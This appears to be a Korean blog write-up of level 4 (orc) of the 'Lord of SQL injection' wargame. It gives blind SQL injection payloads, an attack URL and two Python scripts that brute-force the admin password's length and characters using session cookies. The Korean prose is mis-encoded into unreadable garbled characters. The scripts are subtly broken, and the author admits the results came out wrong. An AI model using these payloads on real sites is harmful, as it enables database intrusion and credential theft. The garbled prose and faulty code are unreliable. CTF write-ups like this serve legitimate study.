์ƒˆ์†Œ์‹

Game/los

Lord of sql injection [4]

  • -
๋ฐ˜์‘ํ˜•
los ๋ฌธ์ œํ’€์ด _ 4๋ฒˆ

 

 

์ด๋ฒˆ ๋ฌธ์ œ๋Š” ์ „ ๋ฌธ์ œ๋“ค๊ณผ ๋‹ค๋ฅด๊ฒŒ sql ์ธ์ ์…˜ ๋ฐฉ์‹์ด ์•„๋‹Œ, 

blind sql injection ๋ฐฉ๋ฒ•์ด๋‹ค.

 

https://lucete1230-cyberpolice.tistory.com/94?category=851757

โ–ฒ๋ธ”๋ผ์ธ๋“œ sql์ด๋ž€?

 

 

๋ฌธ์ œ๋Š” admin ์ด๋ผ๋Š” id์— ์ผ์น˜ํ•˜๋Š” pw์ผ๋•Œ ํ•ด๊ฒฐ๋œ๋‹ค.

 

์ฆ‰ ์‹ค์ œ db์— ์ €์žฅ๋˜์–ด์žˆ๋Š” admin ์ด๋ผ๋Š” ๊ณ„์ •์— pw๋ฅผ ๋งž์ถ”์–ด์•ผ ๋ฌธ์ œ๊ฐ€ ํ•ด๊ฒฐ๋˜๋Š” ๊ฒƒ์ด๋‹ค.

 

๊ทธ๋ ‡๋‹ค๋ฉด ์ผ๋‹จ pw์˜ ๊ธธ์ด๋ฅผ ์•Œ์•„๋‚ด๊ณ , ํ›„์— substring ํ•จ์ˆ˜๋ฅผ ์ด์šฉํ•ด์„œ ํ•œ๊ธ€์ž์”ฉ ๋งž์ถ”๋Š” ์ˆ˜๋ฐ–์— ์—†๋‹ค.

 

 

 

 

๋จผ์ € 'or 1=1# ๋ฅผ ์จ์„œ ์ฟผ๋ฆฌ๋ฅผ ์ฐธ์œผ๋กœ ๋งŒ๋“ค์–ด๋ณด์•˜๋‹ค.

Hello admin์ด๋ผ๋Š” ๊ฒฐ๊ณผ๊ฐ€ ๋…ธ์ถœ๋˜์—ˆ๋‹ค.

 

 

 

 

'or 1=2 #๋ฅผ ์ž…๋ ฅํ•˜์˜€๋”๋‹ˆ ์•„๋ฌด์ฐฝ๋„ ์ถœ๋ ฅ๋˜์ง€ ์•Š๋Š”๋‹ค.

 

์ฆ‰ ์ฐธ ๊ฐ’์„ ๋ฐ˜ํ™˜ํ•˜๋ฉด ์œ„ ๋ฌธ์žฅ์ด ๋œจ๋Š” ๊ฑธ๋กœ ์ฐธ/๊ฑฐ์ง“์„ ๊ตฌ๋ถ„ ํ•  ์ˆ˜ ์žˆ๋‹ค.

 

los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php?id=admin&pw=%27or%20length(pw)=8%20%23

 

 

 

pw='or length(pw)=1# ์ด๋Ÿฐ์‹์˜ ์ฟผ๋ฆฌ๋กœ 1,2,3,4,...์ญ‰ ์ˆซ์ž๋ฅผ ์˜ฌ๋ ค์ฃผ์—ˆ๋”๋‹ˆ 8์ผ ๋•Œ

Hello admin์ด ์ถœ๋ ฅ๋˜์—ˆ๋‹ค.

์ด๊ฒƒ์œผ๋กœ ๋ณด์•„ pw๊ธธ์ด๋Š” 8์ด๋ผ๋Š” ๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค.

 

 

import requests
from bs4 import BeautifulSoup

query1 = "\' or length(pw)= %d#"
dbname =[]

# ์‚ฌ์šฉํ•˜๊ณ  ์žˆ๋Š” DB ๊ธธ์ด ์•Œ์•„๋‚ด๊ธฐ.
print("========= Blind SQL injection ===========")
print("######################data ๋ถ„์„ ์ค‘")

for num in range(0,100):
    dbname += [query1 % num]

    cookies = {'PHPSESSID': '2hoip0fomcakckdq57vnc05450', '__cfduid': 'd24d39185c1d300939a1a3990e085cb961598688032'}
    params = {'id': 'admin', 'pw': dbname}
    res = requests.get('https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php', params=params, cookies=cookies)
    code = res.text  # ์ „์ฒด ์ฝ”๋“œ
    search = "Hello admin"  # ์ฐธ์ผ์‹œ ๋‚˜์˜ค๋Š” ๊ฒฐ๊ณผ ๊ฐ’

    if search in code:
        print("Password Length : ",num)
        break


print("###########################์™„๋ฃŒ")

 

 

์œ„ ์ฝ”๋“œ๋กœ pw๊ธธ์ด๋ฅผ ๊ตฌํ•  ์ˆ˜ ์žˆ๋‹ค. 8๊ธ€์ž ์ธ ๊ฒฝ์šฐ์—๋Š” ํ•˜๋‚˜์”ฉ ์ž…๋ ฅํ•ด๋ณผ ์ˆ˜ ์žˆ์ง€๋งŒ,

hash ๊ฐ’ ๊ฐ™์€ ๊ฒฝ์šฐ ํ›จ์”ฌ ๊ทธ ์ด์ƒ์˜ ๊ฐ’์ด ๋“ค์–ด๊ฐ€๋ฏ€๋กœ ํŒŒ์ด์ฌ์„ ๊ณต๋ถ€ํ•ด๋ณด๋Š” ๊ฒƒ๋„ ์ข‹์€ ๋ฐฉ๋ฒ•์ธ ๊ฒƒ ๊ฐ™๋‹ค.

requets ๋ชจ๋“ˆ์„ ๊ณต๋ถ€ํ•˜๋ฉด ๋  ๊ฒƒ ๊ฐ™๋‹ค!

 

8๊ธ€์ž ๋ผ๋Š” ๊ฒƒ์„ ์•Œ์•˜์œผ๋‹ˆ, ํ•œ ๊ธ€์ž์”ฉ ๋Œ€์ž…ํ•˜์—ฌ, pw๊ฐ’์„ ๊ตฌํ•˜๋ฉด ๋œ๋‹ค.

 

 

 

์ด๋•Œ๋Š” substringํ•จ์ˆ˜๋ฅผ ์ด์šฉํ•ด์„œ ์ฐพ์•„์ฃผ๋ฉด ๋˜๋Š”๋ฐ pw,1,1 ์ฆ‰ ์ฒซ๋ฒˆ์งธ ๊ธ€์ž๋ฅผ ์•Œ์•„๋ณด๋Š” ์ฟผ๋ฆฌ์ด๋‹ค.

2๋ฅผ ์ž…๋ ฅํ•˜๋‹ˆ hello admin์ด ์ถœ๋ ฅ๋˜์—ˆ๋‹ค.

 

์ด๋ ‡๊ฒŒ 8๊ธ€์ž๋ฅผ ์ฐพ์•„์ฃผ๋ฉด ๋˜๋Š”๋ฐ 0-9/a-z ๊ทธ์™ธ์— ํŠน์ˆ˜๋ฌธ์ž๋“ฑ ์„ž์ด๊ฒŒ ๋˜๋ฉด 

ํ•˜๋‚˜ํ•˜๋‚˜ ์ผ์ผ์ด ์น˜๊ธฐ๊ฐ€ ํž˜๋“ค๋‹ค. ๊ทธ๋ž˜์„œ ๋งˆ์ฐฌ๊ฐ€์ง€๋กœ ํŒŒ์ด์ฌ ํˆด์„ ๋งŒ๋“ค์–ด ๋ณด์•˜๋‹ค.

 

 

 

 

์†Œ์Šค ์ฝ”๋“œ๋ฅผ ๋ณด๋ฉด ์ด๋Ÿฐ์‹์œผ๋กœ html์ฝ”๋“œ๋ฅผ ๋ณผ ์ˆ˜ ์žˆ๋Š”๋ฐ ์ฐธ์ธ ๊ฒฝ์šฐ hello admin ์„ ์ถœ๋ ฅํ•˜๋‹ˆ ์ฐธ๊ณ ํ•˜์—ฌ 

ํŒŒ์ด์ฌ ํˆด์„ ์งฐ๋‹ค.

 

 

import requests
from bs4 import BeautifulSoup

query1 = "\' or substring(pw,%d,1)= %s#"
dbname =[]
word =['a', 'b', 'c', 'd', 'e', 'f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
     'w','x','y','z','1','2','3','4','5','6','7','8','9','0','~','!','@','#','$','%','^','&','*','(',
     ')','_','-','+','=','/',';',':','.',' ',"  ",',','[','{',']','}','&&','|','||','<','>','!!']
#print("์ƒํƒœ ์ฝ”๋“œ : ",res.status_code)

import requests
from bs4 import BeautifulSoup

query1 = "\' or substring(pw,%d,1)= %s#"
dbname =[]
word =['a', 'b', 'c', 'd', 'e', 'f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
     'w','x','y','z','1','2','3','4','5','6','7','8','9','0']
#print("์ƒํƒœ ์ฝ”๋“œ : ",res.status_code)

print("========= Blind SQL injection ===========")
# 1. ์‚ฌ์šฉํ•˜๊ณ  ์žˆ๋Š” DB ๊ธธ์ด ์•Œ์•„๋‚ด๊ธฐ.

print("######################data ๋ถ„์„ ์ค‘")

num = 0
while num <= 8:
    num = num+1
    for str in word:
        dbname += [query1 %(num,str)]

        cookies = {'PHPSESSID': '2hoip0fomcakckdq57vnc05450', '__cfduid': 'd24d39185c1d300939a1a3990e085cb961598688032'}
        params = {'id': 'admin', 'pw': dbname}
        res = requests.get('https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php', params=params, cookies=cookies)
        code = res.text  # ์ „์ฒด ์ฝ”๋“œ
        search = "Hello admin"  # ์ฐธ์ผ์‹œ ๋‚˜์˜ค๋Š” ๊ฒฐ๊ณผ ๊ฐ’

        if search in code: #์ฝ”๋“œ์•ˆ์— ์ฐธ์ผ ์‹œ ๋‚˜์˜ค๋Š” ๊ฐ’์ด ๋“ค์–ด๊ฐ€ ์žˆ๋‹ค๋ฉด
            print("Password : ", str)
            break


print("###########################์™„๋ฃŒ")

 

 

ํŒŒ์ด์ฌ์„ ์ ‘ํ•œ์ง€ ์–ผ๋งˆ ์•ˆ๋˜์–ด ์ฝ”๋“œ๊ฐ€ ๊ฐ„๊ฒฐํ•œ ๊ฒƒ๋ณด๋‹จ ์™„์„ฑ์„ ํ•˜๋Š”๊ฒƒ์— ๋ชฉํ‘œ๋ฅผ ๋‘์—ˆ๋‹ค..ใ… 

์ฝ”๋“œ๋ฅผ ๋Œ๋ ค๋ดค๋Š”๋ฐ ๊ฒฐ๊ณผ๊ฐ€ ์ข€ ์ด์ƒํ•œ ๊ฒƒ ๊ฐ™์•˜๋‹ค..

 

๋‹ค๋ฅธ ์‚ฌ๋žŒ๋“ค์ด ์˜ฌ๋ฆฐ ํ•ด์„ค์„ ๋ณด๋ฉด, 295d8544๋ผ๋Š” ๊ฐ’์„ ์ •๋‹ต์ด๋ผ ํ•˜์˜€๋Š”๋ฐ,

๋งŒ๋“  ํˆด์„ ์ด์šฉํ•ด์„œ ๋Œ๋ ค๋ณด๋‹ˆ

 

 

 

๊ฐ’์ด ์ž๊พธ ์ด์ƒํ•˜๊ฒŒ ๋‚˜์™”๋‹ค. ๊ทธ๋ž˜์„œ sql ์ฟผ๋ฆฌ๋ฌธ์— substring์œผ๋กœ ํ•œ๊ธ€์ž์”ฉ ์ฒดํฌ๋ฅผ ํ•ด๋ณด์•˜๋Š”๋ฐ

 

์ •๋‹ต๊ณผ ๋‹ฌ๋ž๋˜ 3๋ฒˆ์งธ ๊ธ€์ž๋ถ€ํ„ฐ ์ฒดํฌ๋ฅผ ํ•ด๋ณด์•˜๋‹ค.

 

 

์ •๋‹ต๋Œ€๋กœ ๋ผ๋ฉด 5๋งŒ ์ฐธ์ด ๋– ์•ผํ•จ

4์ผ๊ฒฝ์šฐ์—๋„ ์ฐธ์— ํ•ด๋‹น๋˜์—ˆ๋˜ ๊ฒฐ๊ณผ hello admin์ด ์ถœ๋ ฅ๋จ.

 

 

 

 

4๋ฒˆ์งธ ๊ธ€์งœ ์—ญ์‹œ ์ฐธ์— ํ•ด๋‹นํ•˜๋Š” ๊ฐ’์ด ํ•œ๊ฐœ๊ฐ€ ์•„๋‹˜.

๊ทธ ์ดํ›„ ๊ธ€์ž๋„ ์—ญ์‹œ, ์ฐธ ๊ฒฐ๊ณผ๋ฅผ ์ฃผ๋Š” ๊ฐ’์ด ํ•œ๊ฐœ๋Š” ์•„๋‹ˆ๋„ค์š”.

์ด๋Ÿด๊ฒฝ์šฐ ๋ฌธ์ œ๊ฐ€ ์ž˜๋ชป ๋˜์—ˆ๋‹ค๊ณ  ํ•ด์•ผํ• ์ง€.............์ฝ”๋“œ๊ฐ€ ์ž˜๋ชป๋œ ๊ฑธ์ง€..

 

์ผ๋‹จ ์ฝ”๋“œ์— abcd ๋“ฑ.. ''a'' ๋กœ ๋˜์–ด์•ผ ํ•ด์„œ ์ฝ”๋“œ๋ฅผ ์ข€ ์ˆ˜์ • ํ•˜์˜€๋”๋‹ˆ 'd'๋Š” ์ •์ƒ์ ์œผ๋กœ ๋œจ์ง€๋งŒ,

์—ฌ์ „ํžˆ ๋‹ค๋ฅธ ๊ฐ’์ด ๋œจ๋„ค์š”.

 

์ฐธ์— ํ•ด๋‹นํ•˜๋Š” ์•ž์—์žˆ๋Š” ๊ฐ’์ด ๋‚˜์˜ค๋Š” ๊ฒƒ ๊ฐ™์•„์š”.^^/

 

 

์–ด์ฐŒ๋˜์—ˆ๋“ , ์ •๋‹ต์€ ์œ„์— ๊ฐ’์ด ๋‹ต์ด์˜€๊ธฐ ๋•Œ๋ฌธ์— ์ผ๋‹จ ๋„˜๊ฒผ์Šต๋‹ˆ๋‹ค..^^ ์กฐ๊ธˆ ์ฐ์ฐํ•˜๋„ค์š” ์กฐ๊ธˆ ๋” ์ž์„ธํžˆ

๊ณต๋ถ€ํ•ด๋ด์•ผ๊ฒ ์–ด์š”.

๋ฐ˜์‘ํ˜•

'Game > los' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

Load of sql injection [ORC]  (0) 2020.09.04
Lord of sql injection [5]  (0) 2020.08.30
Lord of sql injection [3]  (0) 2020.08.30
Lord of sql injection [2]  (0) 2020.08.30
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.